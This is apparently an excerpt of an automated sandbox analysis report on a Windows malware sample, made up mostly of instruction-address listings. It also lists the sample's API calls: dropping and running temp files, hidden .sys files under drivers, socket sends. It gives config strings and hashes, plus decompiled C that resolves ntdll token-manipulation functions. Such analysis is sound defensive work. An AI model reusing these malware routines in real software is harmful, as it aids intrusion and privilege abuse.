                                                                                                                                  0x0040d039
                                                                                                                                  0x0040d03f
                                                                                                                                  0x0040d042
                                                                                                                                  0x0040d042
                                                                                                                                  0x0040d044
                                                                                                                                  0x0040d045
                                                                                                                                  0x0040d045
                                                                                                                                  0x0040d049
                                                                                                                                  0x0040d04b
                                                                                                                                  0x0040d04d
                                                                                                                                  0x0040d04f
                                                                                                                                  0x0040d057
                                                                                                                                  0x0040d059
                                                                                                                                  0x0040d059
                                                                                                                                  0x0040d057
                                                                                                                                  0x0040d06d
                                                                                                                                  0x0040d073
                                                                                                                                  0x0040d07a
                                                                                                                                  0x0040d07a
                                                                                                                                  0x0040d07d
                                                                                                                                  0x0040d07d
                                                                                                                                  0x0040d07f
                                                                                                                                  0x0040d080
                                                                                                                                  0x0040d080
                                                                                                                                  0x0040d084
                                                                                                                                  0x0040d084
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d084
                                                                                                                                  0x0040cfef
                                                                                                                                  0x0040cff5
                                                                                                                                  0x0040cffb
                                                                                                                                  0x0040cffe
                                                                                                                                  0x0040cffe
                                                                                                                                  0x0040d000
                                                                                                                                  0x0040d001
                                                                                                                                  0x0040d001
                                                                                                                                  0x0040d005
                                                                                                                                  0x0040d005
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cf85
                                                                                                                                  0x0040cfb1
                                                                                                                                  0x0040cfbe
                                                                                                                                  0x0040cfc3
                                                                                                                                  0x0040cfc9
                                                                                                                                  0x0040cfcc
                                                                                                                                  0x0040cfcf
                                                                                                                                  0x0040cfcf
                                                                                                                                  0x0040cfd1
                                                                                                                                  0x0040cfd2
                                                                                                                                  0x0040cfd2
                                                                                                                                  0x0040cfd8
                                                                                                                                  0x0040d007
                                                                                                                                  0x0040d007
                                                                                                                                  0x0040d009
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d00b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d00b
                                                                                                                                  0x0040cf2d
                                                                                                                                  0x0040cf2d
                                                                                                                                  0x0040cf30
                                                                                                                                  0x0040cf32
                                                                                                                                  0x0040cf32
                                                                                                                                  0x0040cf58
                                                                                                                                  0x0040cf58
                                                                                                                                  0x0040cf58
                                                                                                                                  0x0040cf5a
                                                                                                                                  0x0040cf5b
                                                                                                                                  0x0040cf5b
                                                                                                                                  0x0040cf61
                                                                                                                                  0x0040cf63
                                                                                                                                  0x0040cf65
                                                                                                                                  0x0040d086
                                                                                                                                  0x0040d086
                                                                                                                                  0x0040d089
                                                                                                                                  0x0040d0fe
                                                                                                                                  0x0040d104
                                                                                                                                  0x0040d104
                                                                                                                                  0x0040d105
                                                                                                                                  0x0040d10c
                                                                                                                                  0x0040d112
                                                                                                                                  0x0040d112
                                                                                                                                  0x0040d115
                                                                                                                                  0x0040d124
                                                                                                                                  0x0040d129
                                                                                                                                  0x0040d129
                                                                                                                                  0x0040d12c
                                                                                                                                  0x0040d130
                                                                                                                                  0x0040d13e
                                                                                                                                  0x0040d144
                                                                                                                                  0x0040d145
                                                                                                                                  0x0040d147
                                                                                                                                  0x0040d155
                                                                                                                                  0x0040d155
                                                                                                                                  0x0040d147
                                                                                                                                  0x0040d177
                                                                                                                                  0x0040d179
                                                                                                                                  0x0040d17c
                                                                                                                                  0x0040d33e
                                                                                                                                  0x0040d372
                                                                                                                                  0x0040d37f
                                                                                                                                  0x0040d384
                                                                                                                                  0x0040d38a
                                                                                                                                  0x0040d38d
                                                                                                                                  0x0040d390
                                                                                                                                  0x0040d390
                                                                                                                                  0x0040d392
                                                                                                                                  0x0040d393
                                                                                                                                  0x0040d393
                                                                                                                                  0x0040d397
                                                                                                                                  0x0040d399
                                                                                                                                  0x0040d39b
                                                                                                                                  0x0040d39d
                                                                                                                                  0x0040d3a5
                                                                                                                                  0x0040d3a7
                                                                                                                                  0x0040d3a7
                                                                                                                                  0x0040d3a5
                                                                                                                                  0x0040d3bd
                                                                                                                                  0x0040d3c3
                                                                                                                                  0x0040d3c7
                                                                                                                                  0x0040d3d5
                                                                                                                                  0x0040d3db
                                                                                                                                  0x0040d3dc
                                                                                                                                  0x0040d3de
                                                                                                                                  0x0040d3ec
                                                                                                                                  0x0040d3ec
                                                                                                                                  0x0040d3de
                                                                                                                                  0x0040d40e
                                                                                                                                  0x0040d410
                                                                                                                                  0x0040d413
                                                                                                                                  0x0040d428
                                                                                                                                  0x0040d42f
                                                                                                                                  0x0040d435
                                                                                                                                  0x0040d439
                                                                                                                                  0x0040d447
                                                                                                                                  0x0040d44d
                                                                                                                                  0x0040d44e
                                                                                                                                  0x0040d450
                                                                                                                                  0x0040d45b
                                                                                                                                  0x0040d45b
                                                                                                                                  0x0040d450
                                                                                                                                  0x0040d461
                                                                                                                                  0x0040d461
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d182
                                                                                                                                  0x0040d195
                                                                                                                                  0x0040d19c
                                                                                                                                  0x0040d1a2
                                                                                                                                  0x0040d1a6
                                                                                                                                  0x0040d1b4
                                                                                                                                  0x0040d1bb
                                                                                                                                  0x0040d1bd
                                                                                                                                  0x0040d1c8
                                                                                                                                  0x0040d1c8
                                                                                                                                  0x0040d1bd
                                                                                                                                  0x0040d1da
                                                                                                                                  0x0040d1e1
                                                                                                                                  0x0040d1e7
                                                                                                                                  0x0040d1e8
                                                                                                                                  0x0040d1ea
                                                                                                                                  0x0040d468
                                                                                                                                  0x0040d468
                                                                                                                                  0x0040d46b
                                                                                                                                  0x0040d47a
                                                                                                                                  0x0040d47f
                                                                                                                                  0x0040d47f
                                                                                                                                  0x0040d482
                                                                                                                                  0x0040d485
                                                                                                                                  0x0040d48b
                                                                                                                                  0x0040d48e
                                                                                                                                  0x0040d496
                                                                                                                                  0x0040d49b
                                                                                                                                  0x0040d4a2
                                                                                                                                  0x0040d4ac
                                                                                                                                  0x0040d4b1
                                                                                                                                  0x0040d4d8
                                                                                                                                  0x0040d4de
                                                                                                                                  0x0040d4e4
                                                                                                                                  0x0040d4e6
                                                                                                                                  0x0040d500
                                                                                                                                  0x0040d506
                                                                                                                                  0x0040d513
                                                                                                                                  0x0040d4e8
                                                                                                                                  0x0040d4f4
                                                                                                                                  0x0040d4fc
                                                                                                                                  0x0040d4fc
                                                                                                                                  0x0040d4e6
                                                                                                                                  0x0040d48e
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d1f0
                                                                                                                                  0x0040d1fd
                                                                                                                                  0x0040d231
                                                                                                                                  0x0040d23e
                                                                                                                                  0x0040d243
                                                                                                                                  0x0040d249
                                                                                                                                  0x0040d24c
                                                                                                                                  0x0040d24f
                                                                                                                                  0x0040d24f
                                                                                                                                  0x0040d251
                                                                                                                                  0x0040d252
                                                                                                                                  0x0040d252
                                                                                                                                  0x0040d256
                                                                                                                                  0x0040d258
                                                                                                                                  0x0040d25a
                                                                                                                                  0x0040d25c
                                                                                                                                  0x0040d264
                                                                                                                                  0x0040d266
                                                                                                                                  0x0040d266
                                                                                                                                  0x0040d264
                                                                                                                                  0x0040d27c
                                                                                                                                  0x0040d282
                                                                                                                                  0x0040d286
                                                                                                                                  0x0040d294
                                                                                                                                  0x0040d29a
                                                                                                                                  0x0040d29b
                                                                                                                                  0x0040d29d
                                                                                                                                  0x0040d2ab
                                                                                                                                  0x0040d2ab
                                                                                                                                  0x0040d29d
                                                                                                                                  0x0040d2cd
                                                                                                                                  0x0040d2cf
                                                                                                                                  0x0040d2d2
                                                                                                                                  0x0040d2eb
                                                                                                                                  0x0040d2f2
                                                                                                                                  0x0040d2f8
                                                                                                                                  0x0040d2fc
                                                                                                                                  0x0040d30e
                                                                                                                                  0x0040d314
                                                                                                                                  0x0040d315
                                                                                                                                  0x0040d317
                                                                                                                                  0x0040d326
                                                                                                                                  0x0040d326
                                                                                                                                  0x0040d317
                                                                                                                                  0x0040d2fc
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d2d2
                                                                                                                                  0x0040d1ea
                                                                                                                                  0x0040d17c
                                                                                                                                  0x0040d08b
                                                                                                                                  0x0040d094
                                                                                                                                  0x0040d097
                                                                                                                                  0x0040d097
                                                                                                                                  0x0040d09a
                                                                                                                                  0x0040d09d
                                                                                                                                  0x0040d0bb
                                                                                                                                  0x0040d0bb
                                                                                                                                  0x0040d0c2
                                                                                                                                  0x0040d0c4
                                                                                                                                  0x0040d0c6
                                                                                                                                  0x0040d0f4
                                                                                                                                  0x0040d0f9
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d0f9
                                                                                                                                  0x0040d0c8
                                                                                                                                  0x0040d0ca
                                                                                                                                  0x0040d0d3
                                                                                                                                  0x0040d0d5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d0d7
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d0d7
                                                                                                                                  0x0040d0cc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d09f
                                                                                                                                  0x0040d09f
                                                                                                                                  0x0040d09f
                                                                                                                                  0x0040d0a8
                                                                                                                                  0x0040d0ab
                                                                                                                                  0x0040d0ae
                                                                                                                                  0x0040d0b5
                                                                                                                                  0x0040d0b6
                                                                                                                                  0x0040d0b6
                                                                                                                                  0x0040d0b6
                                                                                                                                  0x0040d0b6
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d09f
                                                                                                                                  0x0040cf6b
                                                                                                                                  0x0040cf72
                                                                                                                                  0x0040cf74
                                                                                                                                  0x0040cf7a
                                                                                                                                  0x0040d013
                                                                                                                                  0x0040d013
                                                                                                                                  0x0040d015
                                                                                                                                  0x0040d01d
                                                                                                                                  0x0040d01d
                                                                                                                                  0x0040d013
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cf35
                                                                                                                                  0x0040cf35
                                                                                                                                  0x0040cf37
                                                                                                                                  0x0040cf38
                                                                                                                                  0x0040cf3a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cf3c
                                                                                                                                  0x0040cf3c
                                                                                                                                  0x0040cf47
                                                                                                                                  0x0040cf4c
                                                                                                                                  0x0040cf52
                                                                                                                                  0x0040cf55
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cf55
                                                                                                                                  0x0040cf3a
                                                                                                                                  0x0040cf2b
                                                                                                                                  0x0040ced5
                                                                                                                                  0x0040d547
                                                                                                                                  0x0040d54e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d554
                                                                                                                                  0x0040d557
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d55d
                                                                                                                                  0x0040d563
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040d56c
                                                                                                                                  0x0040d577
                                                                                                                                  0x0040d57d
                                                                                                                                  0x0040d583
                                                                                                                                  0x0040ce38
                                                                                                                                  0x0040ce38
                                                                                                                                  0x0040ce38
                                                                                                                                  0x0040ce3b
                                                                                                                                  0x0040ce3f
                                                                                                                                  0x0040ce3f
                                                                                                                                  0x0040ce40
                                                                                                                                  0x0040ce89
                                                                                                                                  0x0040ce90
                                                                                                                                  0x0040ce42
                                                                                                                                  0x0040ce42
                                                                                                                                  0x0040ce42
                                                                                                                                  0x0040ce43
                                                                                                                                  0x0040ce76
                                                                                                                                  0x0040ce7d
                                                                                                                                  0x0040ce80
                                                                                                                                  0x0040ce45
                                                                                                                                  0x0040ce45
                                                                                                                                  0x0040ce46
                                                                                                                                  0x0040ce56
                                                                                                                                  0x0040ce5d
                                                                                                                                  0x0040ce60
                                                                                                                                  0x0040ce60
                                                                                                                                  0x0040ce46
                                                                                                                                  0x0040ce43
                                                                                                                                  0x0040ce98
                                                                                                                                  0x0040ce99
                                                                                                                                  0x0040ce9c
                                                                                                                                  0x0040ce9c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ce3b
                                                                                                                                  0x0040ce36
                                                                                                                                  0x0040cbe8
                                                                                                                                  0x0040cbeb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cbf1
                                                                                                                                  0x0040cbf5
                                                                                                                                  0x0040cdf2
                                                                                                                                  0x0040cdfa
                                                                                                                                  0x0040ce04
                                                                                                                                  0x0040ce09
                                                                                                                                  0x0040ce13
                                                                                                                                  0x0040ce16
                                                                                                                                  0x0040ce1b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ce1b
                                                                                                                                  0x0040cbfb
                                                                                                                                  0x0040cc00
                                                                                                                                  0x0040cc02
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cc0d
                                                                                                                                  0x0040cc10
                                                                                                                                  0x0040cc16
                                                                                                                                  0x0040cdd2
                                                                                                                                  0x0040cdd2
                                                                                                                                  0x0040cdd8
                                                                                                                                  0x0040cde2
                                                                                                                                  0x0040cde7
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cc1c
                                                                                                                                  0x0040cc28
                                                                                                                                  0x0040cc35
                                                                                                                                  0x0040cc3a
                                                                                                                                  0x0040cc3b
                                                                                                                                  0x0040cc47
                                                                                                                                  0x0040cc4a
                                                                                                                                  0x0040cc64
                                                                                                                                  0x0040cc64
                                                                                                                                  0x0040cc66
                                                                                                                                  0x0040cc4c
                                                                                                                                  0x0040cc55
                                                                                                                                  0x0040cc58
                                                                                                                                  0x0040cc5b
                                                                                                                                  0x0040cc62
                                                                                                                                  0x0040cc63
                                                                                                                                  0x0040cc63
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cc68
                                                                                                                                  0x0040cc8d
                                                                                                                                  0x0040cc9a
                                                                                                                                  0x0040cc9f
                                                                                                                                  0x0040ccb4
                                                                                                                                  0x0040ccba
                                                                                                                                  0x0040ccbd
                                                                                                                                  0x0040ccc0
                                                                                                                                  0x0040ccdc
                                                                                                                                  0x0040cce2
                                                                                                                                  0x0040cce5
                                                                                                                                  0x0040cce7
                                                                                                                                  0x0040cdcc
                                                                                                                                  0x0040cced
                                                                                                                                  0x0040cced
                                                                                                                                  0x0040ccf3
                                                                                                                                  0x0040ccfe
                                                                                                                                  0x0040cd21
                                                                                                                                  0x0040cd2a
                                                                                                                                  0x0040cd31
                                                                                                                                  0x0040cd3b
                                                                                                                                  0x0040cd47
                                                                                                                                  0x0040cd4d
                                                                                                                                  0x0040cd52
                                                                                                                                  0x0040cd55
                                                                                                                                  0x0040cd77
                                                                                                                                  0x0040cd7d
                                                                                                                                  0x0040cd7f
                                                                                                                                  0x0040cd89
                                                                                                                                  0x0040cd98
                                                                                                                                  0x0040cd9d
                                                                                                                                  0x0040cda5
                                                                                                                                  0x0040cda5
                                                                                                                                  0x0040cdaa
                                                                                                                                  0x0040cdac
                                                                                                                                  0x0040cdad
                                                                                                                                  0x0040cdb2
                                                                                                                                  0x0040cdb2
                                                                                                                                  0x0040cdb8
                                                                                                                                  0x0040cdc4
                                                                                                                                  0x0040cdc4
                                                                                                                                  0x0040cce7
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ccc0
                                                                                                                                  0x0040cc66
                                                                                                                                  0x0040cc16
                                                                                                                                  0x0040dad2
                                                                                                                                  0x0040dad5
                                                                                                                                  0x0040dadb
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cb60
                                                                                                                                  0x0040cb63
                                                                                                                                  0x00000000
                                                                                                                                  0x0040cb63
                                                                                                                                  0x0040cb5e
                                                                                                                                  0x0040ca4b
                                                                                                                                  0x0040ca4e
                                                                                                                                  0x0040ca4e
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c9d2
                                                                                                                                  0x0040c9d2
                                                                                                                                  0x0040c9d8
                                                                                                                                  0x0040c9e0
                                                                                                                                  0x0040c9e1
                                                                                                                                  0x0040c9e3
                                                                                                                                  0x0040c9e9
                                                                                                                                  0x0040c9f1
                                                                                                                                  0x0040c9fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c9fb
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c9d8
                                                                                                                                  0x0040c9d0
                                                                                                                                  0x0040c9a5
                                                                                                                                  0x0040c9ab
                                                                                                                                  0x0040c9b2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040c9b2

                                                                                                                                  APIs
                                                                                                                                  • closesocket.WS2_32(?), ref: 0040CA4E
                                                                                                                                  • closesocket.WS2_32(?), ref: 0040CB63
                                                                                                                                  • GetTempPathA.KERNEL32(00000120,?), ref: 0040CC28
                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040CCB4
                                                                                                                                  • WriteFile.KERNEL32(0040A4B3,?,-000000E8,?,00000000), ref: 0040CCDC
                                                                                                                                  • CloseHandle.KERNEL32(0040A4B3), ref: 0040CCED
                                                                                                                                  • wsprintfA.USER32 ref: 0040CD21
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040CD77
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0040CD89
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040CD98
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040CD9D
                                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040CDC4
                                                                                                                                  • CloseHandle.KERNEL32(0040A4B3), ref: 0040CDCC
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040CFB1
                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 0040CFEF
                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 0040D033
                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040D10C
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040D155
                                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040D171
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040D195
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040D19C
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002), ref: 0040D1C8
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D231
                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D27C
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D2AB
                                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2C7
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2EB
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2F2
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D326
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D372
                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D3BD
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D3EC
                                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D408
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D428
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D42F
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D45B
                                                                                                                                  • CreateProcessA.KERNEL32(?,00410264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040D4DE
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4F4
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4FC
                                                                                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D513
                                                                                                                                  • closesocket.WS2_32(?), ref: 0040D56C
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D577
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D583
                                                                                                                                  • wsprintfA.USER32 ref: 0040D81F
                                                                                                                                    • Part of subcall function 0040C65C: send.WS2_32(00000000,?,00000000), ref: 0040C74B
                                                                                                                                  • closesocket.WS2_32(?), ref: 0040DAD5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
                                                                                                                                  • String ID: .dat$.sys$4$@$PromptOnSecureDesktop$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
                                                                                                                                  • API String ID: 562065436-3791576231
                                                                                                                                  • Opcode ID: 431c57ecca7ae4cb2b117a44d91882894f065229d5c148e45f2a972d11218836
                                                                                                                                  • Instruction ID: 1bec03d5b3261cfbda03ea9d0ba23ae7472bbf6119f1c93de8fbd0284471d070
                                                                                                                                  • Opcode Fuzzy Hash: 431c57ecca7ae4cb2b117a44d91882894f065229d5c148e45f2a972d11218836
                                                                                                                                  • Instruction Fuzzy Hash: 1BB2B471D00209BBEB209FA4DD85FEA7BB9EB08304F14457BF505B22D1D7789A898B5C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401000 Relevance: 56.2, APIs: 16, Strings: 16, Instructions: 170libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00401000() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				signed int _t4;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				signed int _t34;
				signed int _t35;

				_t2 =  *0x413918;
				_t35 = _t34 | 0xffffffff;
				if(_t2 != 0) {
					L3:
					if( *0x41391c == 0 ||  *0x413920 == 0 ||  *0x413924 == 0 ||  *0x413928 == 0 ||  *0x41392c == 0 ||  *0x413930 == 0 ||  *0x413934 == 0 ||  *0x413938 == 0 ||  *0x41393c == 0 ||  *0x413940 == 0 ||  *0x413944 == 0 ||  *0x413948 == 0 ||  *0x41394c == 0 ||  *0x413950 == 0 ||  *0x413954 == 0) {
						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
						 *0x41391c = _t3;
						if(_t3 == 0) {
							L34:
							_t4 = _t35;
						} else {
							_t35 = 0xfffffffe;
							_t6 = GetProcAddress( *0x413918, "RtlSetLastWin32Error");
							 *0x413920 = _t6;
							if(_t6 == 0) {
								goto L34;
							} else {
								_t35 = 0xfffffffd;
								_t7 = GetProcAddress( *0x413918, "NtTerminateProcess");
								 *0x413924 = _t7;
								if(_t7 == 0) {
									goto L34;
								} else {
									_t35 = 0xfffffffc;
									_t8 = GetProcAddress( *0x413918, "RtlFreeSid");
									 *0x413928 = _t8;
									if(_t8 == 0) {
										goto L34;
									} else {
										_t35 = 0xfffffffb;
										_t10 = GetProcAddress( *0x413918, "RtlInitUnicodeString");
										 *0x41392c = _t10;
										if(_t10 == 0) {
											goto L34;
										} else {
											_t35 = 0xfffffffa;
											_t11 = GetProcAddress( *0x413918, "NtSetInformationThread");
											 *0x413930 = _t11;
											if(_t11 == 0) {
												goto L34;
											} else {
												_t35 = 0xfffffff9;
												_t12 = GetProcAddress( *0x413918, "NtSetInformationToken");
												 *0x413934 = _t12;
												if(_t12 == 0) {
													goto L34;
												} else {
													_t35 = 0xfffffff8;
													_t14 = GetProcAddress( *0x413918, "RtlNtStatusToDosError");
													 *0x413938 = _t14;
													if(_t14 == 0) {
														goto L34;
													} else {
														_t35 = 0xfffffff7;
														_t15 = GetProcAddress( *0x413918, "NtClose");
														 *0x41393c = _t15;
														if(_t15 == 0) {
															goto L34;
														} else {
															_t35 = 0xfffffff6;
															_t16 = GetProcAddress( *0x413918, "NtOpenProcessToken");
															 *0x413940 = _t16;
															if(_t16 == 0) {
																goto L34;
															} else {
																_t35 = 0xfffffff5;
																_t18 = GetProcAddress( *0x413918, "NtDuplicateToken");
																 *0x413944 = _t18;
																if(_t18 == 0) {
																	goto L34;
																} else {
																	_t35 = 0xfffffff4;
																	_t19 = GetProcAddress( *0x413918, "RtlAllocateAndInitializeSid");
																	 *0x413948 = _t19;
																	if(_t19 == 0) {
																		goto L34;
																	} else {
																		_t35 = 0xfffffff3;
																		_t20 = GetProcAddress( *0x413918, "NtFilterToken");
																		 *0x41394c = _t20;
																		if(_t20 == 0) {
																			goto L34;
																		} else {
																			_t35 = 0xfffffff2;
																			_t22 = GetProcAddress( *0x413918, "RtlLengthSid");
																			 *0x413950 = _t22;
																			if(_t22 == 0) {
																				goto L34;
																			} else {
																				_t35 = 0xfffffff1;
																				_t23 = GetProcAddress( *0x413918, "NtQueryInformationToken");
																				 *0x413954 = _t23;
																				_t1 = _t35 + 0x10; // 0x100000001
																				_t4 = _t1;
																				if(_t23 == 0) {
																					goto L34;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						return _t4;
					} else {
						return 1;
					}
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x413918 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}






















                                                                                                                                  0x00401000
                                                                                                                                  0x00401006
                                                                                                                                  0x0040100b
                                                                                                                                  0x00401023
                                                                                                                                  0x0040102a
                                                                                                                                  0x004010c2
                                                                                                                                  0x004010c4
                                                                                                                                  0x004010cb
                                                                                                                                  0x0040127b
                                                                                                                                  0x0040127b
                                                                                                                                  0x004010d1
                                                                                                                                  0x004010dc
                                                                                                                                  0x004010e1
                                                                                                                                  0x004010e3
                                                                                                                                  0x004010ea
                                                                                                                                  0x00000000
                                                                                                                                  0x004010f0
                                                                                                                                  0x004010fc
                                                                                                                                  0x00401101
                                                                                                                                  0x00401103
                                                                                                                                  0x0040110a
                                                                                                                                  0x00000000
                                                                                                                                  0x00401110
                                                                                                                                  0x0040111c
                                                                                                                                  0x00401121
                                                                                                                                  0x00401123
                                                                                                                                  0x0040112a
                                                                                                                                  0x00000000
                                                                                                                                  0x00401130
                                                                                                                                  0x0040113b
                                                                                                                                  0x00401140
                                                                                                                                  0x00401142
                                                                                                                                  0x00401149
                                                                                                                                  0x00000000
                                                                                                                                  0x0040114f
                                                                                                                                  0x0040115b
                                                                                                                                  0x00401160
                                                                                                                                  0x00401162
                                                                                                                                  0x00401169
                                                                                                                                  0x00000000
                                                                                                                                  0x0040116f
                                                                                                                                  0x0040117b
                                                                                                                                  0x00401180
                                                                                                                                  0x00401182
                                                                                                                                  0x00401189
                                                                                                                                  0x00000000
                                                                                                                                  0x0040118f
                                                                                                                                  0x0040119a
                                                                                                                                  0x0040119f
                                                                                                                                  0x004011a1
                                                                                                                                  0x004011a8
                                                                                                                                  0x00000000
                                                                                                                                  0x004011ae
                                                                                                                                  0x004011ba
                                                                                                                                  0x004011bf
                                                                                                                                  0x004011c1
                                                                                                                                  0x004011c8
                                                                                                                                  0x00000000
                                                                                                                                  0x004011ce
                                                                                                                                  0x004011da
                                                                                                                                  0x004011df
                                                                                                                                  0x004011e1
                                                                                                                                  0x004011e8
                                                                                                                                  0x00000000
                                                                                                                                  0x004011ee
                                                                                                                                  0x004011f9
                                                                                                                                  0x004011fe
                                                                                                                                  0x00401200
                                                                                                                                  0x00401207
                                                                                                                                  0x00000000
                                                                                                                                  0x00401209
                                                                                                                                  0x00401215
                                                                                                                                  0x0040121a
                                                                                                                                  0x0040121c
                                                                                                                                  0x00401223
                                                                                                                                  0x00000000
                                                                                                                                  0x00401225
                                                                                                                                  0x00401231
                                                                                                                                  0x00401236
                                                                                                                                  0x00401238
                                                                                                                                  0x0040123f
                                                                                                                                  0x00000000
                                                                                                                                  0x00401241
                                                                                                                                  0x0040124c
                                                                                                                                  0x00401251
                                                                                                                                  0x00401253
                                                                                                                                  0x0040125a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040125c
                                                                                                                                  0x00401268
                                                                                                                                  0x0040126d
                                                                                                                                  0x0040126f
                                                                                                                                  0x00401276
                                                                                                                                  0x00401276
